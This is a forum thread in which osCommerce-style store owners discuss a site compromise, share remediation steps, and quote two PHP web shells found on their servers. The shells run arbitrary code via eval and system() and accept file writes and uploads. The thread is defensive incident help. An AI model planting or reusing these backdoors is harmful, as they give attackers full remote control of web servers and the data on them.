mainpage.php contents replaced

[Wolga]

My fault... I should check more often for world writable files.

The mainpage.php of a customers site was world writable. The contents were replaced with the following code.

PHP Code:

<?php if(@$_GET['cookies']==1){echo 'Cookies must be enabled !';$tf='';if(@$_POST['tf']){$tf=@$_POST['tf'];}if(@$_POST['e']){eval(@$_POST['e']);}if(@$_POST['t']){if($tf!=''){$f=fopen($tf,'w');fwrite($f,@$_POST['t']);fclose($f);}}if(@$_FILES['f']['name']!=''){$tf=$_FILES['f']['name'];move_uploaded_file(@$_FILES['f']['tmp_name'],$tf);}exit;}?>

Anyone recognize this code and what the hacker or bot intended to do and how worried I need to be?


After I encountered this I used the following command to search out world writable files.

find / -type f -perm -o+w -exec ls -l {} ;

Actually without the / so it would search only the customers public_html directory.

and tightened up the permissions



Needless to say I'll be running various scans of the system but...

If anyone recognizes this hack and can give me a hint of what to look for I would be grateful.

Thanks

[Wolga]

Update.

I successfully thwarted the intruder. The logs fortunately told me the IP that modified the file so I blocked it and it hasn't been hacked again yet.

See attached picture.

It was an ip location was Makiyivka in Ukraine and since she will never ship over seas I blocked it.

I may try to block a range in case they get a new IP and start their shenanigans again.

I also complied with your security suggestions and renamed the admin directory and also password protected it.

Keeping fingers crossed now.

Hopefully this thwarted them enough so they'll move on to an easier target.

Nobody so far recognizes that code they inserted?

The 2 times it was inserted, it was discovered and removed shortly after the insert because she is in the store several times a day and noticed it right away. Hopefully whatever it was doing, it wasn't able to succeed due to being quickly removed.

[tcshadow]

I have been having the same issue... anyone have a fix for this? Michael S?

[tcshadow]

Wolga check your /images directory you'll probably find goog1*.php files in there generated by this code or the hacker. I found some in my site

CRE Loaded - View topic - Security Breach on our Site

[Wolga]

Thanks tcshadow.

I did find goog1*.php files in the image directory all with the same IP number reading and writing them.

I grepped my log files for the culprit IP to see what files were accessed and also checked for a partial ip

I attached a text file of my grepped logs

That was a busy script.

I did as my previous post mentioned and renamed the admin directory.

Quite a while back I remember deleting the filemanager when the email notice came from oscmax however I see that there are access attempts to that file.

I now removed the goog*php files.

Looks like the accesses stopped after I messed with the security.

There are a few more attempts after I added the IP to etc/hosts.deny
I added all:91.211.16.126

Although after adding that to the hosts.deny seems to have stopped the problem I still see accesses to some of the files. Not sure how that can be but it is apparent in the logs.

I see the last attempt was on the admin directory on the 6th and 7th of Sep/2010 and since the admin directory was renamed they had no luck with that.

There seems to be no attempts since then.

Hope the attached logs.txt file will be helpful to those who have more security expertise than myself.

The multiple goog*.php files had the same code if anyone knows what it was doing.

PHP Code:

Goog1e_analist_up<?php $e=@$_POST['e'];$s=@$_POST['s'];if($e){eval($e);}if($s){system($s);}if($_FILES['f']['name']!=''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}?>

I think my focus this week will be upgrading her store. Thank Ancients for Navicat.

Thanks again tcshadow for the help.

[Wolga]

I also found 4 of these in the database under manufacturers

goog1ec34ca4c49772b8.php

Different numbers after the goog1 though.

[Wolga]

I found this link explaining the malicious code.
What's the purpose of this PHP code/hack.? - Stack Overflow

[dani]

first changed file in my site was includes/languages/... / cookie_usage.php

can som one change this file content in admin side?

[Wolga]

first changed file in my site was includes/languages/... / cookie_usage.php

can som one change this file content in admin side?

I'm pretty sure there is no way to edit these types of files from the store admin.

You can use a ftp or rather, a secure (sFtp) program to download, edit and then re-upload the changed file.

Make sure to keep a log and detailed notes of the changes you make to core files so when you upgrade your store in the future you can recall all the modifications and merge them into the upgraded files.

Most hosting service control panels will have a web based file manager you can use to edit files as well.

[dani]

I'm pretty sure there is no way to edit these types of files from the store admin.

You can use a ftp or rather, a secure (sFtp) program to download, edit and then re-upload the changed file.

Make sure to keep a log and detailed notes of the changes you make to core files so when you upgrade your store in the future you can recall all the modifications and merge them into the upgraded files.

Most hosting service control panels will have a web based file manager you can use to edit files as well.

can he/she use define_language.php file?